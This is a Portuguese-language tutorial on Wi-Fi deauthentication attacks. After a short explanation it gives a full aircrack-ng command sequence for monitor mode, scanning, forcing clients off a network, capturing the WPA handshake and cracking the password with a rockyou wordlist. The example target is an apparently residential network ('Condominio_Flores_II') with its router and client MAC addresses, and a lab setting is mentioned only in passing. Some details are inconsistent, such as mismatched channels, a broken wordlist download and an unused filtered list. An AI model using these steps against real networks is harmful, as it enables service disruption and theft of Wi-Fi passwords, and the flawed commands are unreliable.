Ataque de Deauth ou Dissociação de Redes WI-FI
Redes cabeadas se autenticam com 3 Way Handshake, eqto redes de Wi-fi autenticam com 4 Way Handshake.
🛡️ Como funciona um ataque de desautenticação?
Os atacantes que desejam realizar um ataque de desautenticação geralmente usam dispositivos habilitados para Wi-Fi e software especializado. O processo básico envolve o seguinte:
- Captura de tráfego Wi-Fi: O atacante inicia a captura de tráfego da rede Wi-Fi alvo usando ferramentas como um sniffer de pacotes.
- Identificação de dispositivos-alvo: O atacante identifica os dispositivos que desejam desconectar da rede.
- Envio de pacotes de desautenticação: Usando o endereço MAC dos dispositivos-alvo, o atacante envia pacotes de desautenticação, forçando os dispositivos a se desconectarem da rede.
- Repetição contínua: O atacante pode repetir esse processo para manter os dispositivos desconectados da rede.
🎯 Objetivos de um ataque de desautenticação de Wi-Fi
Os atacantes realizam ataques de desautenticação de Wi-Fi por várias razões, incluindo:
- Interrupção da conectividade: Desconectar dispositivos da rede pode causar interrupções significativas nas operações normais, afetando a produtividade e o acesso à Internet.
- Espionagem: O ataque pode ser usado como uma tática para espionar o tráfego de rede dos dispositivos-alvo enquanto eles tentam se reconectar à rede.
- Ameaças cibernéticas: Em alguns casos, os ataques de desautenticação podem ser o primeiro passo para invasões mais graves, como ataques de força bruta a senhas.
Instala a ferramenta de monitoramento:
sudo apt install aircrack-ng
Valida o nome da sua placa de rede wi-fi:
ip -c addr
Valida possíveis conflitos de hardware antes de iniciar os processos:
sudo airmon-ng check kill
Coloca a placa de rede wi-fi em modo monitoramento:
sudo airmon-ng start wlan0
Valida o novo nome da sua placa de captura de redes wi-fi:
ip -c addr
sudo airmon-ng
Inicia o scan de todas as redes próximas (aparecerão diversas redes):
sudo airodump-ng wlan0mon
Encerra o scan das redes após escolher o alvo:
ctrl+c
Anote o ESSID (Nome) da rede alvo, bem como o BSSID (MAC) e tbém o CANAL (CH):
Condominio_Flores_II
64:D1:54:09:EE:3E
4
Podemos validar apenas a rede alvo, se preferir:
sudo airodump-ng wlan0mon -d 64:D1:54:09:EE:3E
Posso me conectar á rede wi-fi alvo, se for um laboratório, usando um celular.
Vai constar o novo cliente, com dados do aparelho, definidos em STATION.
TERMINAL 01
- VAMOS INICIAR A CAPTURA DOS PACOTES
Subo o comando de captura de pacotes da rede alvo e salvo o arquivo de captura:
sudo airodump-ng -w capturados -c 2 --bssid 64:D1:54:09:EE:3E wlan0mon
sudo airodump-ng -w capturados --channel 2 --essid Condominio_Flores_II wlan0mon
Á partir daqui, eu aguardo algum dispositivo se conectar para realizar a captura do 4 Way Hand Shake.... OU
TERMINAL 02
- VAMOS INICIAR O ATAQUE DE DESAUTENTICAÇÃO
Inicia o ataque ao roteador alvo (todos os clientes caem durante o ataque):
sudo aireplay-ng --deauth 0 -a 64:D1:54:09:EE:3E wlan0mon
Posso tbém, desautenticar apenas um dispositivo específico
sudo aireplay-ng --deauth 5 -a 64:D1:54:09:EE:3E -c 28:6C:07:6F:F9:53 wlan0mon
Ao tentar re-conexão, os clientes entregam o handshake de 4 vias no TERMINAL 01:
[WPA handshake]: 64:D1:54:09:EE:3E
Podemos encerrar a captura no TERMINAL 01
ctrl+c
Podemos encerrar o ataque no TERMINAL 02
ctrl+c
Até esse ponto apenas teríamos um ataque de Negação de serviço (DDOS), MAS, nós salvamos um arquivo com informações (capturados.cap) e vamos usá-lo
Instale o Wireshark e abra o arquivo de captura, filtrando mensagens criptografadas, do tipo EAPOL:
sudo apt install wireshark
wireshark capturados.cap
OU
Baixe sua wordlist para quebrar a senha capturada usando o aircrack-ng:
wget https://github.com/zacheller/rockyou.git
wc -l rockyou.txt
Focaremos apenas em senhas que contenham de 8 a 64 caracteres, diminuindo o tempo de conjunções:
sudo grep -x '.\{8,64\}' rockyou.txt > wparockyou.txt
wc -l wparockyou.txt
aircrack-ng capturados.cap -w /home/usuariox/wordlists/rockyou.txt
O resultado deve ser uma mensagem:
KEY FOUNF [ P@ssword123 ]
Retira a placa de rede wi-fi do modo monitoramento:
airmon-ng stop wlan0mon
Restaura sua placa de rede para navegação:
systemctl restart NetworkManager
Alternativa de varredura de rede pelo terminal:
nmcli device wifi list
N-USE = rede que você está usando
BSSID = endereço do roteador
SSID = nome da rede
MODE = infra (?)
CHAN = canal que está sendo utilizado pelo roteador
RATE = taxa de transferência
SIGNAL = intensidade do sinal em %
BARS = intensidade do sinal em barras
SECURITY = protocolos de segurança do roteador